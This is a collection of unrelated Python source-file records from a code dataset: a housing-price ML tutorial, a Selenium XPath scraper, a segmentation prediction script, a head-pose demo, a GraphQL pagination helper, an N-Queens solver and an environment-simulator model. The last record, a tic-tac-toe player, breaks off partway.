to\nmake a prediction (it will use the district’s population, the median income,\netc.) Finally, since there is no continuous flow of data coming in the system,\nthere is no particular need to adjust to changing data rapidly, and the data\nis small enough to fit in memory, so plain batch learning is considered.\n\"\"\"\n\nimport hashlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport pprint\nfrom pandas.tools.plotting import scatter_matrix\nfrom sklearn.model_selection import train_test_split, StratifiedShuffleSplit\nfrom sklearn.preprocessing import Imputer, LabelEncoder, OneHotEncoder,\\\n LabelBinarizer, StandardScaler\nfrom sklearn.pipeline import Pipeline, FeatureUnion\n\npd.set_option('display.max_column', None)\n\nDATASET_PATH = '../resources/'\n\ndef load_data(path_str):\n \"\"\" Return dataset\n\n Read CSV file containing dataset and return pandas DataFrame\n \"\"\"\n path = os.path.join(path_str, 'housing.csv')\n \n return pd.read_csv(path)\n\ndef split_data(data, test_percent, use_seed):\n \"\"\" Return test & train sub-datasets\n\n Avoid data snooping bias, split dataset in train & test sub-datasets.\n \"\"\"\n if use_seed == True:\n np.random.seed(42)\n rand_idx = np.random.permutation(len(data))\n arr_size = int(len(data) * test_percent)\n test_idx = rand_idx[:arr_size]\n train_idx = rand_idx[arr_size:]\n \n return data.iloc[train_idx], data.iloc[test_idx]\n\ndef test_set_check(id, test_percent, hash):\n \"\"\" Obtain data from only new rows\n\n Put an instance in the test set if the computed hash value is lower or equal to\n 51 (~20% of 256)\n \"\"\"\n\n return hash(np.int64(id)).digest()[-1] < 256 * test_percent\n\ndef split_data_hash(data, test_percent, id_col, hash=hashlib.md5):\n \"\"\" Return test & train sub-datasets\n\n Avoid data snooping bias, split dataset in train & test sub-datasets.\n \"\"\"\n id_list = data[id_col]\n in_test = id_list.apply(lambda id_: test_set_check(id_, test_percent, hash))\n\n return data.loc[~in_test], data.loc[in_test]\n\ndef main():\n \"\"\"------------------------------------------------------------------------\"\"\"\n data = load_data(DATASET_PATH)\n #train_data, test_data = split_data(data, 0.2, True)\n \n data_id = data.reset_index() # Add an 'index' column\n train_data, test_data = split_data_hash(data_id, 0.2, 'index')\n\n #data_id['id'] = data['longitude'] * 1000 + data['latitude']\n #train_data, test_data = split_data_hash(data_id, 0.2, 'id')\n\n train_data, test_data = train_test_split(data, test_size=0.2, random_state=42)\n\n data['income_cat'] = np.ceil(data['median_income'] / 1.5)\n data['income_cat'].where(data['income_cat'] < 5, 5.0, inplace=True)\n\n split = StratifiedShuffleSplit(n_splits=1, test_size=0.2,\n random_state=42)\n for train_ind, test_ind in split.split(data, data['income_cat']):\n strat_train_data = data.loc[train_ind]\n strat_test_data = data.loc[test_ind]\n\n for set in (strat_train_data, strat_test_data):\n set.drop(['income_cat'], axis=1, inplace=True)\n\n # Make a copy of the training data\n data = strat_train_data.copy()\n \n # s=radius, c=color\n \"\"\"\n data.plot(kind='scatter', x='longitude', y='latitude', alpha=0.4,\n s=data['population']/100, label='population', c='median_house_value',\n cmap=plt.get_cmap('jet'), colorbar=True)\n plt.show()\n plt.legend()\n \"\"\"\n\n #corr_matrix = data.corr()\n #attr = ['median_house_value', 'median_income',\n # 'total_rooms', 'housing_median_age']\n\n #scatter_matrix(data[attr])\n #scatter_matrix(data)\n #data.plot(kind='scatter', x='median_income', y='median_house_value',\n # alpha=0.1)\n #plt.show()\n\n # Add meaningful variables to housing dataset\n data['rooms_per_household'] = data['total_rooms']/data['households']\n data['bedrooms_per_room'] = data['total_bedrooms']/data['total_rooms']\n data['population_per_household'] = data['population']/data['households']\n\n # Calculate new correlation matrix with new variables\n corr_matrix = data.corr()\n #print(corr_matrix['median_house_value'].sort_values(ascending=False))\n\n \"\"\"------------------------------------------------------------------------\"\"\"\n \"\"\" Prepare the data for Machine Learning algorithms \"\"\"\n data = strat_train_data.drop('median_house_value', axis=1)\n data_labels = strat_train_data['median_house_value'].copy()\n\n # Data Cleaning\n # Methods for eliminating columns\n #data.dropna(subset=['total_bedrooms']) # Method 1\n #data.drop('total_bedrooms', axis=1) # Method 2\n #median = data['total_bedrooms'].median()\n #data['total_bedrooms'].fillna(median) # Method 3 (compute median value\n # on training dataset)\n\n # Methods for filling in missing data\n imputer = Imputer(strategy='median')\n data_num = data.drop('ocean_proximity', axis=1)\n imputer.fit(data_num)\n #print(imputer.statistics_ - data_num.median().values)\n\n #data_tr = pd.DataFrame(imputer.transform(data_num), columns=data_num.columns)\n\n # Encode data as integers\n #encoder = LabelEncoder()\n #data_encoded_int = encoder.fit_transform(data['ocean_proximity'])\n\n # One-hot encoding for categoricals\n #encoder = OneHotEncoder()\n #data_encoded_onehot = encoder.fit_transform(data_encoded_int.reshape(-1, 1))\n #pprint.pprint(data_encoded_onehot)\n\n # One shot one-hot encoding from text categorical to one-hot vectors\n #encoder = LabelBinarizer()\n #data_encoded = encoder.fit_transform(data['ocean_proximity'])\n \n # Add combined attributes\n from CombinedAttributesAdder import CombinedAttributesAdder\n #attr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)\n #housing_extra_attribs = attr_adder.transform(data.values)\n\n #pprint.pprint(housing_extra_attribs)\n\n num_pipeline = Pipeline([\n ('imputer', Imputer(strategy='median')),\n ('attribs_adder', CombinedAttributesAdder()),\n ('std_scalar', StandardScaler())\n ])\n\n # The Pipeline constructor takes a list of name/estimator pairs defining a\n # sequence of steps. All but the last estimator must be transformers (i.e.,\n # they must have a fit_transform() method)\n #data_num_tr = num_pipeline.fit_transform(data_num)\n\n from future_encoders import ColumnTransformer\n from future_encoders import OneHotEncoder as OneHotEncoderFtr\n num_attribs = list(data_num)\n cat_attribs = ['ocean_proximity']\n\n full_pipeline = ColumnTransformer([\n (\"num\", num_pipeline, num_attribs),\n (\"cat\", OneHotEncoderFtr(), cat_attribs),\n ])\n\n data_prepared = full_pipeline.fit_transform(data)\n\n \"\"\"------------------------------------------------------------------------\"\"\"\n \"\"\" Select and Train a Model \"\"\"\n # Training and Evaluating on the Training Set\n from sklearn.metrics import mean_squared_error\n def display_scores(scores):\n print(\"Scores:\", scores)\n print(\"Mean:\", scores.mean())\n print(\"Standard deviation:\", scores.std())\n\n # Linear Regression\n from sklearn.linear_model import LinearRegression\n lin_reg = LinearRegression()\n lin_reg.fit(data_prepared, data_labels) \n data_predictions = lin_reg.predict(data_prepared)\n lin_rmse = np.sqrt(mean_squared_error(data_labels, data_predictions))\n\n # Decision Tree Regressor\n from sklearn.tree import DecisionTreeRegressor\n tree_reg = DecisionTreeRegressor()\n tree_reg.fit(data_prepared, data_labels)\n data_predictions = tree_reg.predict(data_prepared)\n tree_rmse = np.sqrt(mean_squared_error(data_labels, data_predictions))\n\n # Evaluating using Cross-Validations\n # performs K-fold cross-validation: it randomly splits the training set into\n # 10 distinct subsets called folds, then it trains and evaluates the model\n # 10 times, picking a different fold for evaluation every time and training\n # on the other 9 folds.\n #The result is an array containing the 10 evaluation scores\n from sklearn.model_selection import cross_val_score\n # Decision Tree Scores\n tree_scores = cross_val_score(tree_reg, data_prepared, data_labels, \\\n scoring='neg_mean_squared_error', cv=10)\n tree_rmse_scores = np.sqrt(-tree_scores) \n #print('Decision Tree Regressor Scores:')\n #display_scores(tree_rmse_scores)\n\n # Linear Regression Scores\n lin_scores = cross_val_score(lin_reg, data_prepared, data_labels, \\\n scoring='neg_mean_squared_error', cv=10)\n lin_rmse_scores = np.sqrt(-lin_scores)\n #print('')\n #print('Linear Regression Scores:')\n #display_scores(lin_rmse_scores)\n\n # Random Forests Scores\n from sklearn.ensemble import RandomForestRegressor\n forest_reg = RandomForestRegressor(random_state=42)\n forest_reg.fit(data_prepared, data_labels)\n\n data_predictions = forest_reg.predict(data_prepared)\n forest_rmse = np.sqrt(mean_squared_error(data_labels, data_predictions))\n forest_scores = cross_val_score(forest_reg, data_prepared, data_labels, \\\n scoring='neg_mean_squared_error', cv=10)\n forest_rmse_scores = np.sqrt(-forest_scores)\n #print('')\n #print('Random Forests Scores:')\n #display_scores(forest_rmse_scores)\n\n # Support Vector Regression\n from sklearn.svm import SVR\n svm_reg = SVR(kernel=\"linear\")\n svm_reg.fit(data_prepared, data_labels)\n data_predictions = svm_reg.predict(data_prepared)\n svm_rmse = np.sqrt(mean_squared_error(data_labels, data_predictions))\n\n #print(lin_rmse)\n #print(tree_rmse)\n #print(forest_rmse)\n #print(svm_rmse)\n\n \"\"\"------------------------------------------------------------------------\"\"\"\n \"\"\" Fine-Tune Models \"\"\"\n # Grid Search\n from sklearn.model_selection import GridSearchCV\n param_grid = [\n # try 12 (3×4) combinations of hyperparameters\n {\n 'n_estimators': [30, 100],\n 'max_features': [8, 12, 16]\n },\n # then try 6 (2×3) combinations with bootstrap set as False\n {\n 'bootstrap': [False],\n 'n_estimators': [3, 10],\n 'max_features': [2, 3, 4]\n }\n ]\n\n forest_reg = RandomForestRegressor(random_state=42)\n grid_search = GridSearchCV(forest_reg, param_grid, cv=5, \\\n scoring='neg_mean_squared_error')\n grid_search.fit(data_prepared, data_labels)\n #print(\"grid_search.best_params_:\", grid_search.best_params_)\n #print(\"grid_search.best_estimator_:\", grid_search.best_estimator_)\n \n \"\"\"\n cv_results = grid_search.cv_results_\n for mean_score, params in\\\n zip(cv_results['mean_test_score'], cv_results['params']):\n print(np.sqrt(-mean_score), params)\n \"\"\"\n\n # Randomized Search\n \"\"\"\n from sklearn.model_selection import RandomizedSearchCV\n from scipy.stats import randint\n param_distribs = {\n 'n_estimators': randint(low=1, high=200),\n 'max_features': randint(low=1, high=16)\n }\n\n forest_reg = RandomForestRegressor(random_state=42)\n rnd_search = RandomizedSearchCV(forest_reg,\\\n param_distributions=param_distribs, n_iter=10, cv=5,\\\n scoring='neg_mean_squared_error', random_state=42)\n rnd_search.fit(data_prepared, data_labels)\n \n cv_results = rnd_search.cv_results_\n for mean_score, params in\\\n zip(cv_results['mean_test_score'], cv_results['params']):\n print(np.sqrt(-mean_score), params)\n \"\"\"\n\n \"\"\"------------------------------------------------------------------------\"\"\"\n \"\"\" Analyze Best Models and Errors \"\"\"\n \"\"\"\n feature_importances = grid_search.best_estimator_.feature_importances_\n #print(feature_importances)\n\n extra_attribs = [\"rooms_per_hhold\", \"pop_per_hhold\", \"bedrooms_per_room\"]\n cat_encoder = full_pipeline.named_transformers_[\"cat\"]\n cat_one_hot_attribs = list(cat_encoder.categories_[0])\n attributes = num_attribs + extra_attribs + cat_one_hot_attribs\n pprint.pprint(sorted(zip(feature_importances, attributes), reverse=True))\n \"\"\"\n\n \"\"\"------------------------------------------------------------------------\"\"\"\n \"\"\" Evaluate the System on the Test Set \"\"\"\n final_model = grid_search.best_estimator_\n\n X_test = strat_test_data.drop('median_house_value', axis=1)\n y_test = strat_test_data['median_house_value'].copy()\n\n X_test_prepared = full_pipeline.transform(X_test)\n final_prediction = final_model.predict(X_test_prepared)\n\n final_rmse = np.sqrt(mean_squared_error(y_test, final_prediction))\n print(final_rmse)\n\nif __name__ == \"__main__\":\n main()","sub_path":"pi_c2/housing_example.py","file_name":"housing_example.py","file_ext":"py","file_size_in_byte":12913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370527633","text":"# encoding:utf-8\r\n\r\nfrom selenium import webdriver\r\nfrom time import sleep\r\nimport json\r\nimport execjs\r\nfrom lxml import etree\r\n\r\n\r\ndef getXpath():\r\n option = webdriver.ChromeOptions()\r\n option.add_argument('headless')\r\n driver = webdriver.Chrome(r\"D:\\Selenium WebDriver\\Chrome\\chromedriver_win32\\chromedriver.exe\",\r\n chrome_options=option)\r\n driver.get(\"https://www.sf-express.com/cn/sc/dynamic_function/more/payment/\")\r\n driver.maximize_window()\r\n sleep(1)\r\n\r\n res = driver.execute_script('return document.title')\r\n print(res)\r\n\r\n element = driver.find_element_by_xpath('//*[@id=\"carryId\"]')\r\n id = element.get_property('id')\r\n domObj = \"document.getElementById('{}')\".format(id)\r\n\r\n js = \"\"\"\r\n function getPathTo(element) {\r\n var ix= 0;\r\n return element.parentNode\r\n var siblings= element.parentNode.childNodes;\r\n for (var i= 0; i0.5\n actual = actual>0.5\n inter = actual & pred\n union = actual | pred\n\n iou = inter.sum()/(union.sum()+1e-8)\n return iou \n\ndef main(args):\n \"\"\"\n does the prediction for all images in TestDir (the test set)\n prints out iou, compares to the Wu-iou and saves preds to user specified dir \n assumes network output is 2 channels\n \"\"\"\n\n image_folder = args.file_path\n label_folder = args.label_path\n wu_folder = args.wu_pred\n output_path = args.output_path\n flipflag = args.flip_flag ## For TTA, TODO\n model_arch = args.model_arch\n model_path = args.model_path\n save_flag = args.save_flag\n verbose = False\n print(\" output folder is \", output_folder)\n\n\n os.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpu_use # set GPU to use\n\n print(\" start loading models with arch: \",model_arch)\n parallel_flag=False\n gpu_flag=True\n model = load_models.getModel(model_arch=model_arch,output_channels=output_channels,parallel_flag=parallel_flag)\n curr_dict = torch.load(model_path, map_location=lambda storage, loc: storage)['model_state'] # this is wrapped in DataParallel so need to undo it\n model_dict = OrderedDict()\n for k, v in curr_dict.items():\n name = k[7:]\n model_dict[name] = v\n model.load_state_dict(model_dict)\n print(\"---------loaded state dict----\")\n\n if verbose==True:\n print(\" ------ printing model on screen --------- \")\n for param_tensor in model.state_dict():\n print(param_tensor, \"\\t\", model.state_dict()[param_tensor].size())\n print(\" ----------------------------------------- \")\n model.eval()\n\n\n toc = time.time(); count_files=0\t\n for files in os.listdir(image_folder):\n filename, ext = os.path.splitext(files)\n image_file = os.path.join(image_folder, filename) +\".npy\"\n label_file = os.path.join(label_folder, filename) +\".npy\"\n wu_file = os.path.join(wu_folder, filename) +\".npy\"\n\n image_load = np.load(image_file)\n label_load = np.load(label_file)\n wu_pred = np.load(wu_file)\n wu_pred[wu_pred>0.9]=1; wu_pred[wu_pred!=1]=0 # this threshold works best for wu\n\n label_load = label_load.transpose(2,1,0)\n wu_pred = wu_pred.transpose(2,1,0)\n\n image_load = (image_load - np.mean(image_load))/np.std(image_load)\n image_load = image_load.transpose(2,1,0)\n image_load = np.expand_dims(image_load,0)\n image_load = np.expand_dims(image_load,0) # 1,1,Z,X,Y\n\n with torch.no_grad():\n image_tensor = torch.from_numpy(image_load).float().cuda()\n preds = model(image_tensor)\n\n logits = preds['logits']\n probits = F.softmax(logits,dim=1).data.cpu().numpy()\n pred_argmax = np.argmax(probits[0,:,:,:,:], axis=0).astype(np.float32)\n iou_preds = computeiou(pred_argmax,label_load)\n iou_wu = computeiou(wu_pred,label_load)\n print(\" ---- for filename %s iou preds: %f wu-model: %f ----\"%(filename,iou_preds,iou_wu))\n\n if save_flag==True:\n output_file = os.path.join(out_folder,filename)+\".npy\"\n np.save(output_file, pred_argmax.transpose(2,1,0)) # save in X,Y,Z format same as test labels/images\n\n count_files +=1\n\n tic = time.time()\t\n print(\"=====================================================\")\n print(\" Done prediction for %d files in %f s\" %(count_files, tic-toc))\n print(\"=====================================================\")\n\nif __name__ == '__main__':\n help_string = \"PyTorch Fault prediction\"\n\n parser = argparse.ArgumentParser(description=help_string)\n\n parser.add_argument('-f', '--file-path', type=str, metavar='DIR', help='Path where test images is located', required=True)\n parser.add_argument('-l', '--label-path', type=str, metavar='DIR', help='Path where test data labels is located', required=True)\n parser.add_argument('-w', '--wu-pred', type=str, metavar='DIR', help='Path where WU-predictions is located', required=True)\n parser.add_argument('-o', '--output-path', type=str, metavar='DIR', help='Path where predictions will be written out', required=True)\n parser.add_argument('-m', '--model-path', type=str, metavar='DIR', help='Path where trained model is stored', required=True)\n parser.add_argument('-arch', '--model-arch', type=str, metavar='ARCH', help='Architecture of the model (default: LinkNet34)', default='linknet34', required=False)\n\n parser.add_argument('-flipflag', '--flip-flag', type=int, metavar='W', help='flip image during test for TTA 0 or 1', default=0, required=True)\n parser.add_argument('-gpu-use', '--gpu-use', type=str, metavar='H', help='which gpu to use(default: 0)', default=0, required=True)\n\n args = parser.parse_args()\n\n main(args)\n\n sys.exit(1)\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"369709148","text":"#constructor is used to initialise instance variables\n\n# class Person:\n# def __init__(self,name,age,adress): #constructor\n# self.name=name\n# self.age=age\n# self.adress=adress\n# def printval(self):\n# print(self.name,self.age,self.adress)\n# obj=Person('Anu',26,'abc')\n# obj.printval()\n\n#......................................Employee Class........................\nclass Employee:\n cname='Luminar'\n def __init__(self,name,dept,salary):\n self.name=name\n self.dept=dept\n self.salary=salary\n def printval(self):\n print(self.name,self.dept,self.salary,Employee.cname)\nobj=Employee('Anu','design',25000)\nobj.printval()","sub_path":"oop/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"204798633","text":"\"\"\"\nDemo code shows how to estimate human head pose.\nHuman face is detected by a detector from an OpenCV DNN module.\nThen, the face box is slightly modified to suit the need of landmark detection.\nFacial landmark detection is done by a custom Convolutional Neural Network trained with TensorFlow.\nFinally, head pose is estimated by solving a PnP problem.\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom multiprocessing import Process, Queue\n\nfrom cv2 import cv2\nimport numpy as np\n\nfrom markDetector import MarkDetector\nfrom osDetector import detectOS\nfrom poseEstimator import PoseEstimator\nfrom stabilizer import Stabilizer\n\nprint(\"OpenCV version: {}\".format(cv2.__version__))\n\n# multiprocessing may not work on Windows and macOS, check OS for safety\ndetectOS()\n\nCNN_INPUT_SIZE = 128\n\n# take arguments from user input\nparser = ArgumentParser()\nparser.add_argument(\"--video\", type=str, default=None,\n help=\"Video file to be processed.\")\nparser.add_argument(\"--cam\", type=int, default=None,\n help=\"The webcam index.\")\nargs = parser.parse_args()\n\n\ndef getFace(detector, imgQueue, boxQueue):\n \"\"\"Get face from image queue. This function is used for multiprocessing\"\"\"\n while True:\n image = imgQueue.get()\n box = detector.extractCNNFacebox(image)\n boxQueue.put(box)\n\n\ndef main():\n \"\"\"MAIN\"\"\"\n # video source from webcam or video file\n videoSource = args.cam if args.cam is not None else args.video\n if videoSource is None:\n print(\"Warning: video source not assigned, default webcam will be used.\")\n videoSource = 0\n\n cap = cv2.VideoCapture(videoSource)\n if videoSource == 0:\n cap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n _, sampleFrame = cap.read()\n\n # introduce markDetector to detect landmarks\n markDetector = MarkDetector()\n\n # setup process and queues for multiprocessing\n imgQueue = Queue()\n boxQueue = Queue()\n imgQueue.put(sampleFrame)\n boxProcess = Process(target=getFace, args=(\n markDetector, imgQueue, boxQueue,))\n boxProcess.start()\n\n # introduce pose estimator to solve pose\n # get one frame to setup the estimator according to the image size\n height, width = sampleFrame.shape[:2]\n poseEstimator = PoseEstimator(imgSize=(height, width))\n\n # introduce scalar stabilizers for pose\n poseStabilizers = [Stabilizer(\n stateNum=2,\n measureNum=1,\n covProcess=0.1,\n covMeasure=0.1) for _ in range(6)]\n\n tm = cv2.TickMeter()\n\n while True:\n # read frame, crop it, flip it, suits your needs\n frameGot, frame = cap.read()\n if frameGot is False:\n break\n\n # crop it if frame is larger than expected\n # frame = frame[0:480, 300:940]\n\n # if frame comes from webcam, flip it so it looks like a mirror\n if videoSource == 0:\n frame = cv2.flip(frame, 2)\n\n # Pose estimation by 3 steps:\n # 1. detect face\n # 2. detect landmarks\n # 3. estimate pose\n\n # feed frame to image queue\n imgQueue.put(frame)\n\n # get face from box queue\n facebox = boxQueue.get()\n\n if facebox is not None:\n # detect landmarks from image of 128x128\n faceImg = frame[facebox[1]: facebox[3],\n facebox[0]: facebox[2]]\n faceImg = cv2.resize(faceImg, (CNN_INPUT_SIZE, CNN_INPUT_SIZE))\n faceImg = cv2.cvtColor(faceImg, cv2.COLOR_BGR2RGB)\n\n tm.start()\n marks = markDetector.detectMarks([faceImg])\n tm.stop()\n\n # convert the marks locations from local CNN to global image\n marks *= (facebox[2] - facebox[0])\n marks[:, 0] += facebox[0]\n marks[:, 1] += facebox[1]\n\n # uncomment following line to show raw marks\n # markDetector.drawMarks(frame, marks, color=(0, 255, 0))\n\n # uncomment following line to show facebox\n # markDetector.drawBox(frame, [facebox])\n\n # try pose estimation with 68 points\n pose = poseEstimator.solvePoseBy68Points(marks)\n\n # stabilize the pose\n steadyPose = []\n poseNp = np.array(pose).flatten()\n for value, psStb in zip(poseNp, poseStabilizers):\n psStb.update([value])\n steadyPose.append(psStb.state[0])\n steadyPose = np.reshape(steadyPose, (-1, 3))\n\n # uncomment following line to draw pose annotation on frame\n # poseEstimator.drawAnnotationBox(frame, pose[0], pose[1], color=(255, 128, 128))\n\n # uncomment following line to draw stabile pose annotation on frame\n poseEstimator.drawAnnotationBox(\n frame, steadyPose[0], steadyPose[1], color=(128, 255, 128))\n\n # uncomment following line to draw head axes on frame\n # poseEstimator.drawAxes(frame, stabile_pose[0], stabile_pose[1])\n\n # Show preview.\n cv2.imshow(\"Preview\", frame)\n if cv2.waitKey(10) == 27:\n break\n\n # Clean up the multiprocessing process.\n boxProcess.terminate()\n boxProcess.join()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Dense_Motion_Estimation/Head Pose Estimation/estimateHeadPose.py","file_name":"estimateHeadPose.py","file_ext":"py","file_size_in_byte":5204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509832250","text":"# Copyright (c) 2017 FlashX, LLC\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\nimport base64\nimport graphene\n\n\nclass ListBasedConnection(object):\n def __init__(self, edges, cursors, args):\n \"\"\"Class to provide Relay compliant pagination for list based connections\n\n Args:\n edges(list): A list of edge data\n cursors(list): A list of cursors for edges\n args(dict): The input arguments to the resolve method\n\n Returns:\n ListBasedConnection\n \"\"\"\n self.edges = edges\n self.cursors = cursors\n self.args = args\n self.page_info = None\n\n def apply(self):\n \"\"\"Method to apply cursors to the edges\n\n Returns:\n None\n \"\"\"\n\n if \"first\" in self.args and \"last\" in self.args:\n raise ValueError(\"`first` and `last` arguments cannot be used together\")\n\n # Verify valid slicing args\n if \"first\" in self.args:\n if int(self.args[\"first\"]) < 0:\n raise ValueError(\"`first` must be greater than 0\")\n if \"last\" in self.args:\n if int(self.args[\"last\"]) < 0:\n raise ValueError(\"`last` must be greater than 0\")\n\n # Apply cursor filters\n after_index = None\n before_index = None\n if \"after\" in self.args:\n if self.args[\"after\"] in self.cursors:\n # Remove edges after cursor\n after_index = int(base64.b64decode(self.args[\"after\"]))\n else:\n raise ValueError(\"`after` cursor is invalid\")\n\n if \"before\" in self.args:\n if self.args[\"before\"] in self.cursors:\n # Remove edges after cursor\n before_index = int(base64.b64decode(self.args[\"before\"]))\n else:\n raise ValueError(\"`before` cursor is invalid\")\n\n if after_index is not None and before_index is not None:\n self.edges = self.edges[after_index + 1:before_index]\n self.cursors = self.cursors[after_index + 1:before_index]\n elif after_index is not None:\n self.edges = self.edges[after_index + 1:]\n self.cursors = self.cursors[after_index + 1:]\n elif before_index is not None:\n self.edges = self.edges[:before_index]\n self.cursors = self.cursors[:before_index]\n\n pre_slice_len = len(self.edges)\n\n # Apply slicing filters\n if \"first\" in self.args:\n if len(self.edges) > int(self.args[\"first\"]):\n self.edges = self.edges[:int(self.args[\"first\"])]\n self.cursors = self.cursors[:int(self.args[\"first\"])]\n\n if \"last\" in self.args:\n if len(self.edges) > int(self.args[\"last\"]):\n self.edges = self.edges[-int(self.args[\"last\"]):]\n self.cursors = self.cursors[-int(self.args[\"last\"]):]\n\n # Compute page info status\n has_previous_page = False\n if \"last\" not in self.args or len(self.edges) == 0:\n has_previous_page = False\n elif pre_slice_len > int(self.args[\"last\"]):\n has_previous_page = True\n\n has_next_page = False\n if \"first\" not in self.args or len(self.edges) == 0:\n has_next_page = False\n elif pre_slice_len > int(self.args[\"first\"]):\n has_next_page = True\n\n if len(self.edges) == 0:\n start_cursor, end_cursor = None, None\n else:\n start_cursor, end_cursor = self.cursors[0], self.cursors[-1]\n\n # startCursor and endCursor\n self.page_info = graphene.relay.PageInfo(has_next_page=has_next_page, has_previous_page=has_previous_page,\n start_cursor=start_cursor, end_cursor=end_cursor)\n","sub_path":"lmsrvcore/api/connections/list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"5630059","text":"class Solution(object):\n def solveNQueens(self, n):\n \"\"\"\n :type n: int\n :rtype: List[List[str]]\n \"\"\"\n def dfs(queens, xy_diff, xy_sum):\n q = len(queens)\n if q == n:\n ret.append(queens)\n return\n for p in range(n):\n if p+q not in xy_sum and p-q not in xy_diff and p not in queens:\n xy_diff.add(p-q)\n xy_sum.add(p+q)\n dfs(queens+[p], xy_diff, xy_sum)\n xy_diff.remove(p-q)\n xy_sum.remove(p+q)\n ret = []\n dfs([], set(), set())\n print(ret)\n return [['.'*i + 'Q' + '.'*(n-i-1) for i in board] for board in ret]\n","sub_path":"51_N-Queens_H.py","file_name":"51_N-Queens_H.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"188313581","text":"import torch\nimport torch.nn.functional as F\nfrom torch import nn\n\nfrom codes.model.base_model import BaseModel\nfrom codes.model.imagination_model.util import get_component\nfrom codes.utils.util import get_product_of_iterable\n\n\nclass Model(BaseModel):\n \"\"\"Recurrent Environment Simulator.\n This model uses the observation-dependent path\"\"\"\n\n def __init__(self, config):\n super(Model, self).__init__(config=config)\n self.convolutional_encoder = get_component(\"convolutional_encoder\", config)\n self.state_transition_model = get_component(\"state_transition_model\", config)\n self.convolutional_decoder = get_component(\"convolutional_decoder\", config)\n self.weights = self.get_weights_dict()\n\n def get_weights_dict(self):\n _latent_size = self.config.model.imagination_model.latent_size\n _hidden_state_size = self.config.model.imagination_model.hidden_state_size\n _action_size = get_product_of_iterable(self.config.env.action_space[\"shape\"])\n return torch.nn.ModuleDict({\n \"w_action\": torch.nn.Sequential(\n nn.Linear(_action_size, _latent_size)\n ),\n \"w_h\": torch.nn.Sequential(\n nn.Linear(_hidden_state_size, _latent_size)\n ),\n\n })\n\n def encode_obs(self, obs):\n obs_shape = obs.shape\n per_image_shape = obs_shape[-3:]\n batch_size = obs_shape[0]\n trajectory_length = obs_shape[1]\n num_frames = obs_shape[2]\n h_t = self.convolutional_encoder(obs.view(-1, *per_image_shape)).view(batch_size, trajectory_length, num_frames, -1)\n h_t = torch.mean(h_t, dim=2)\n return h_t, trajectory_length\n\n def decode_obs(self, output, trajectory_length):\n reconstructed_obs = self.convolutional_decoder(output)\n per_image_shape = reconstructed_obs.shape[-3:]\n batch_size = int(reconstructed_obs.shape[0]/trajectory_length)\n return reconstructed_obs.view(batch_size, trajectory_length, *per_image_shape)\n\n\n def forward(self, x):\n # not that x is same as x_(t-1)\n\n h_t, trajectory_length = self.encode_obs(obs = x.obs)\n action = x.action\n\n # action = (x.action).view(effetive_batch_size, -1)\n\n # mu, logsigma = self.variational_encoder(h_t)\n # sigma = logsigma.exp()\n # eps = torch.randn_like(sigma)\n # z_t = eps.mul(sigma).add_(mu)\n self.state_transition_model.set_state(h_t[:,0,:])\n output = []\n for t in range(0, trajectory_length):\n action_fusion = self.weights[\"w_action\"](action[:,t,:]) * self.weights[\"w_h\"](self.state_transition_model.h_0.squeeze(0))\n inp = torch.cat((action_fusion, h_t[:,t,:]), dim=1)\n output.append(self.state_transition_model(inp.unsqueeze(1)))\n output = torch.cat(output, dim=1).view(-1, self.config.model.imagination_model.hidden_state_size)\n reconstructed_obs = self.decode_obs(output, trajectory_length)\n return reconstructed_obs\n\n\n def loss(self, output, x):\n \"\"\" loss function \"\"\"\n true_obs = x.next_obs\n # Not that we have to manually divide because of an issue in Pytorch. The fix is available only in master for now.\n return F.mse_loss(true_obs[:, :, 3, :, :, :], output) * 255 / (get_product_of_iterable(output.shape))\n\n","sub_path":"codes/model/imagination_model/recurrent_environment_simulator_obs_dependent_path_deterministic.py","file_name":"recurrent_environment_simulator_obs_dependent_path_deterministic.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"361020685","text":"import random\n\nfrom pytictactoe.field import Field\nfrom pytictactoe.field_type import FieldType\nfrom pytictactoe.player import ai_service\nfrom pytictactoe.player.base_player import BasePlayer\n\n\nclass CleverPlayer(BasePlayer):\n\n def get_str_player(self):\n if self.get_my_field_type() == FieldType.X:\n return 'X'\n elif self.get_my_field_type() == 